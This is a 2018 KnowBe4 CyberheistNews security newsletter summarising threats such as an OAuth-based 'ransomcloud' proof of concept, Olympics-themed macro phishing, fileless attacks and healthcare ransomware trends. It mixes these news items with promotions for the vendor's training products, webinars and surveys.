CyberheistNews Vol 8 #3 [Heads-up] Unusual Ransomware Strain Encrypts Cloud Email Real-Time VIDEO

CyberheistNews Vol 8 #03
[Heads-up] Unusual Ransomware Strain Encrypts Cloud Email Real-Time VIDEO

OK, here is something unusual and really scary.

KnowBe4's Chief Hacking Officer Kevin Mitnick called me with some chilling news. A white hat hacker friend of his developed a working "ransomcloud" strain, which encrypts cloud email accounts like Office 365 in real-time . My first thought was: "Holy $#!+".

I asked him: "Can you show it to me?", and Kevin sent me a video demo, you can see it below. Lucky for us, this type of ransomware strain is not in the wild at the moment.

When I started looking into it, the proof of concept that he mentions in the video has been around for a while, but it's on the horizon, because if a white hat can do this, so can a black hat. I am wondering why they haven't already, because it's not all that hard to do.

This strain uses a smart social engineering tactic to trick the user to give the bad guys access to their cloud email account, with the ruse of a "new Microsoft anti-spam service".

Once your employee clicks "accept" to use this service, it's game over: all email and attachments are encrypted real-time! The ransomcloud attack will work for any cloud email provider that allows an application giving control over the email via oauth. With Google it will work if you get the app past their verification process. Outlook365 doesn't verify the app at this point so its much easier.

See it for realz here (video is just 5 minutes) and shiver:
Phishing the Olympics - Is Basketball Next?

McAfee turned up a good example of plausible, well-timed phishbait over last weekend. A malicious Word document was circulated to South Korean targets interested in the upcoming Winter Olympics, particularly targets involved with hockey.

The spoofed email appeared to come from "," an email address belonging to the Republic of Korea's National Counter-Terrorism Center (NCTC).

The timing coincided with pre-Olympic drills the NCTC was actually holding around Pyeongchang, so receiving an Olympic-themed email from them would be unlikely to arouse suspicion.

The organizations, mostly corporations, that were blind-copied had some involvement with the Winter Olympics. The email carried a document entitled, "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics." The document contains an obfuscated Visual Basic macro.

The recipient is advised to "enable content" so the document is visible in their version of Microsoft Word. Should they enable content, they will execute a PowerShell script steganographically hidden in a convincing-looking logo image.

So this was sophisticated social engineering, with good target selection, attractive phishbait, and nice timing. Your organization might consider training for other periods when this kind of approach might be tried against you.

For example, how many of your employees do you think will be swapping, and opening, basketball-themed emails when people begin filling out their NCAA brackets come March? Strengthen your human firewall, because automated filters are unlikely to catch it all. Here is McAfee's report:
Live Webinar: Phishing Attack Landscape and Industry Benchmarking

One of your important and ongoing IT security initiatives is getting the Phish-prone percentage of your users as low as possible.

But how are you doing compared to "similar-size peers" in your industry?

We just completed a big-data analytics exercise over the 15,000 customers we have and came up with new baseline Phish-prone percentages, and how fast it drops.

The numbers are very interesting to say the least, and we are releasing them in a webinar this Thursday!

Join security experts Stu Sjouwerman, CEO at KnowBe4, and Perry Carpenter, Chief Evangelist and Strategy Officer at KnowBe4 and former Gartner Research Analyst, for this live webinar “Phishing Attack Landscape and Benchmarking” as they discuss brand-new research based on what your users are clicking. Find out how you are doing compared to your peers with new phishing benchmarks by industry.

Key topics covered in this webinar:
  • New phishing benchmark data by industry
  • Understanding the current phishing landscape
  • Most clicked simulated phishing attacks
  • Top 10 “In the Wild” reported phishing emails
  • Actionable tips to create your “human firewall”
Date/Time: Thursday, January 18th at 2:00 pm EST
Live Attendees Limited to just 2,000 -- Register Now!
Take the 2018 KnowBe4 Endpoint Protection Effectiveness Survey for a Chance to Get 500 Bucks

Ransomware, external attacks, and data breaches are all financially damaging security concerns that are a focus for IT today.

So, how are you protecting your organization from becoming a victim of these threats? In this fast, 5-minute “2018 Endpoint Protection Effectiveness Survey” online survey, we want to hear about your first-hand experience with ransomware, external attacks, and data breaches, what you’re doing to protect your organization, and just how effective your current protection strategy really is.

Every respondent completing this 5-minute survey will receive a free Kevin Mitnick lockpick business card.

Hurry and take the survey now - be one of the first 500 to take the survey and have a chance to win one of FIVE 500-DOLLAR AMEX gift cards!

Take The Survey Now:

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"Keep away from people who try to belittle your ambitions. Small people always do that, but the really great makes you feel that you, too, can become great." - Mark Twain - Author (1835 - 1910)

"If you can't fly, then run; if you can't run, then walk; if you can't walk, then crawl; but whatever you do, you have to keep moving forward." - Dr. Martin Luther King Jr. (1929 - 1986)

"It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently." - Warren Buffett

Thanks for reading CyberheistNews
Security News
Ignorance: The Opposite of Bliss

Most employees confess to ignorance of their company's security policies, according to a study B2B Enterprises and Kaspersky Lab recently concluded. Only 12% were "fully aware" of their organization's security policies. A higher but still disturbingly low 49% said they regarded cybersecurity as a shared responsibility.

Even granting that being "fully aware" of an organization's security policies may be a high bar to clear, the figures are still troubling. Clearly, the legacy approach to security awareness training, usually a once-a-year or so session with a compliance-heavy death-by-PowerPoint, is about as effective as you'd expect it to be.

For effective security awareness training that prepares employees for the threats they'll actually face, an interactive, timely, and realistic platform like KnowBe4's is worth considering. You'll find an account of this depressing study in Security Asia:
eBook Cyberheist: The BIGGEST Financial Threat Facing American Businesses

Cybercrime has gone pro over the last 5 years. Attacks have become much more sophisticated and intense. The bad guys are now going after your employees. They bypass your firewall/antivirus security software and social engineer your employees to click on a malicious link or open an infected attachment.

From that point forward they hack into your network and put keyloggers on accounting systems. You can guess the rest. A few days later the organization’s bank accounts are empty, or valuable corporate intellectual property is stolen. Another cyberheist victim. It’s happening right now, as you read this.

Cyberheist was fully updated and written for the IT team and owners / management of Small and Medium Enterprise. Want to read this bestseller? As a newsletter subscriber you can get this as a complimentary eBook, it's an instant 240-page PDF download!
Responding to the Rise of Fileless Attacks

Excellent article in DarkReading: Fileless attacks, easier to conduct and more effective than traditional malware-based threats, pose a growing challenge to enterprise targets.

Cybercriminals take the path of least resistance -- which is why more of them are adopting fileless attacks to target their victims. The threat is poised to grow as attackers recognize the ease of this method and more employees rely on mobile and cloud to do their jobs.

Fileless attacks let threat actors skip the steps involved with traditional malware-based attacks. They don't need to create payloads; they can simply use trusted programs to exploit in-memory access. In 2017, fileless malware attacks leveraging PowerShell or Windows Management Instrumentation tools made up 52% of all attacks for the year.

Yet businesses still aren't paying attention.

"Our focus in this industry is still on traditional attack vectors we've been dealing with for most of our careers," says Heath Renfrow, CISO at Leo Cyber Security.

It's time for businesses to take a closer look at how these threats work, how they can be detected, why they're predicted to grow, and the steps they can take to protect themselves.

What Can You Do About It?

Protecting against phishing starts with employee education. "Trick them, test them, teach them," says Lovejoy. "The goal is to immunize enough people so the disease can't take hold." Employees should also have a means to report activity they feel is suspicious.

"Always enact the policy 'If you see something, say something,'" she adds. On top of this, businesses should take a close look at activity in their ecosystems. Full article here:
Healthcare Breaches Involving Ransomware Increase Year-Over-Year

“End of year research conducted by Cryptonite indicates that there were a total of 140 data breach events characterized and reported to HHS/OCR as IT/hacking in 2017 representing a 23.89% increase over the 113 IT/hacking events reported in 2016.”

The number of reported major IT/hacking events attributed to ransomware by healthcare institutions increased by 89% from 2016 to 2017. This was an increase from 19 reported events in 2016 to a total of 36 events in 2017.

In 2017 ransomware events represented 25% of all events reported to HHS/OCR and attributed to IT/hacking. All 6 of the 6 largest IT/hacking healthcare events reported in 2017 were attributed to ransomware.

There were 3,442,748 records reported compromised in 2017, a substantial decrease from 13,425,263 reported compromised in 2016 as cyberattackers diversified their attacks against a broader mix of healthcare entities.

In past years, cyber criminals invested considerable time and effort in targeting the largest healthcare institutions as evidenced by the 2015 events impacting Anthem (78.8 million records), Premera Blue Cross (11 million records) and by the 2016 events impacting Banner Health (3.6 million records) and Newkirk Products (3.4 million records).

This low hanging fruit has to some extent been harvested and attackers are now increasingly turning their attention to the broader mix of health care entities.

The emergence and refinement of advanced ransomware tools lowers both the cost and the time for cyberattackers to target smaller healthcare institutions – now they can cost effectively reach physician practices, surgical centers, diagnostic laboratories, MRI/CT scan centers and many other smaller yet critical healthcare institutions.

This is the beginning of a trend that will increase very substantially in 2018 and 2019. More:

Hackers increasingly target patient records as HCPs do little to protect data

One in five healthcare professionals has experienced breaches of patient data, yet many also say they’re “very confident” in their facility’s ability to protect that data against theft, according to a survey by University of Phoenix College of Health Professions.

Despite increased data breaches in all industries, only a quarter of registered nurses (RNs) have seen changes in the way their companies handle data security over the past year.

The data also reveals a worrying disconnect between healthcare professionals’ confidence in protecting sensitive patient data and the actual protection of that data.

Some 48% of RNs and 57 percent of administrative staff say they are “very confident” their institution can safeguard patient records against potential data theft. At the same time, only 25 percent of RNs and 40 percent of admin staff cited data security & privacy improvements over the past year. More:
Phishing the Phishers: Sneaky Crooks Put Backdoors Into Kits for Wannabe Fraudsters

You no longer need to be a skilled coder to commit cybercrime. Over the last several years a thriving criminal-to-criminal black market in phishing kits has arisen.

Script kiddies can purchase attackware-as-a-service from the Dark Web Malware Depot for their social engineering attacks. And such kits are now being offered for free. And why not? After all, don't we get a lot of legitimate services for free, too?

Well, naive criminal, not so fast. There are wheels within wheels here. People are fond of saying: "If you're not paying for the product, you are the product".

The criminals offering the kits are offering them with mechanisms installed to quietly siphon off any information their criminal customers are able to steal. This means that an organization hooked by a phishing attack might well see its information shared far more widely than it had even feared. See the story in SC Magazine for more information:
Excellent Learning Resource If You Run in the Cloud

I ran into Ryan Kroonenburg at an investor day of Elephant, our Venture Capital partners. They had also invested in A Cloud Guru and Ryan is their CEO. Turns out that A Cloud Guru is growing like crazy and trains IT pros on how to create AWS architecture, and even become certified as AWS Certified Solutions Architect. I checked out their site and you should have a look at it too!

While we are talking about training for IT pros, did you know that 30% of data breaches in 2017 took advantage of software vulnerabilities and weaknesses. Stop vulnerabilities at the source and meet compliance requirements with effective hands-on Secure Developer Training from HackEDU. Learn more about this offensive "think like a hacker" training. See a demo of their excellent SQL injection training here:
IRS Issues Warning on New Tax Info Phishing Attempts

The Internal Revenue Service (IRS) has warned tax professionals that a new round of emails from cybercriminals posing as potential clients are attempting to trick practitioners into disclosing sensitive information.

The Security Summit, comprising the IRS, state tax agencies, and the tax industry, on January 9, 2018, encouraged tax practitioners to be wary of communicating solely by email with potential or even existing clients, especially if unusual requests are made.

"Data breach thefts have given thieves millions of identity data points including names, addresses, Social Security numbers, and email addresses. If in doubt, tax practitioners should call to confirm a client's identity," said the IRS.

Fraudsters are using phishing emails to trick tax professionals into opening a link or attached document by posing as potential clients. If the practitioner responds, the criminal will send a second email that contains either a phishing URL or an attached document that contains a phishing URL, claiming their tax data is enclosed.

The fraudster wants the tax professional to click on the link or attachment and then enter their credentials. In some cases, the URL or attachment might be malicious and if clicked will download malicious software onto the tax professional's computer.

"Depending on the malware involved, this scheme could give fraudsters access to the tax practitioners' secure accounts or sensitive data. It may even give the fraudster remote control of the tax professionals' computers," said the IRS.

The agency has also received reports of a scam involving cybercriminals posing as IRS e-Services, asking tax professionals to sign into their accounts and providing a disguised link. The link sends tax professionals to a fake e-Services site that steals their usernames and passwords.

The IRS reminded tax professionals that it does not send unsolicited mails. Tax practitioners receiving emails from fraudsters posing as the IRS, or even their tax software provider, should go directly to the main website, such as, rather than opening any links or attachments. Source:
Brace for the GDPR Compliance Deadline: May 2018

GDPR will be your most notable compliance challenge in 2018.

Here is an example: if anyone from the EU fills out their information on your website, you need to comply with the GDPR. That is everybody, and that means your organization needs to have someone wearing the hat of the Data Protection Officer (DPO). Guess who? Right, probably you.

The effective date is May 25 this year and it will impact every organization that handles European Union (EU) residents’ personal data, even if the data processing occurs outside EU borders.

You are going to have to do a data impact risk assessment, which is a mandatory requirement under GDPR, and this is a critical deliverable especially if your organization experiences a breach.

The best way to do a data impact risk assessment is to do your own data mapping exercise, since it is impossible to protect data when you do not know what data lives where. You need to know how is it used, how is it transmitted, and how is it destroyed (end of life) which may all be defined by your data location and sensitivity.

Organizations must enable DPOs to manage the GDPR compliance program months before the deadline. Did your IT team start?

It is expected that most IT people in the EU responsible for compliance will be aware of and preparing for GDPR in 2018, but how about the US? Is your budget sufficient to support what is needed for compliance?

Over the last 4 years, KnowBe4 has developed KCM, KnowBe4 Compliance Manager, a cloud-based service which consolidates your audit management and regulatory compliance tasks into simple automated workflows that prevent overlap and eliminate gaps. It will help you get and stay GDPR compliant.

See how you can get audits done in half the time at half the cost: Check out the new KCM page and request a demo:
Interesting News Items This Week

‘Handle Fear By Understanding’: Q&A With KnowBe4’s Security Training Advocate Erich Kron:‘handle-fear-by-understanding’-qa-with-knowbe4s

WSJ: Boards Seek Bigger Role in Thwarting Hackers:

4 Steps To Launch A Security Awareness Training Program. Good article at CSO:

Seven Ways Cybercriminals Can Use Machine Learning:

Virus Total: New VirusTotal Graph Makes It Easy to Visualize Malware:

WPA3 WiFi Standard Announced After Researchers KRACKed WPA2 Three Months Ago:

More than half of US-based employees have never heard of GDPR. They need to get trained!:

The K-12 Cyber Incident Map is a visualization of cybersecurity-related incidents reported about U.S. K-12 public schools and districts from 2016 to the present. Scary:

AI learns how to fool speech-to-text. That’s bad news for voice assistants:

Study: 45% of companies don’t have cybersecurity leader:
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
    • Here is your latest 3 min virtual vacation: SPACE! A beautiful trip through the universe from Hubble images. HD, full screen/headphones! (and while you watch this, consider this unusual definition of space: "a viewpoint of dimension".)

FOLLOW US ON: Twitter | LinkedIn | Google | YouTube
Copyright © 2014-2017 KnowBe4, Inc. All rights reserved.

Subscribe To Our Blog

Weak Password Test Contest

Get the latest about social engineering

Subscribe to CyberheistNews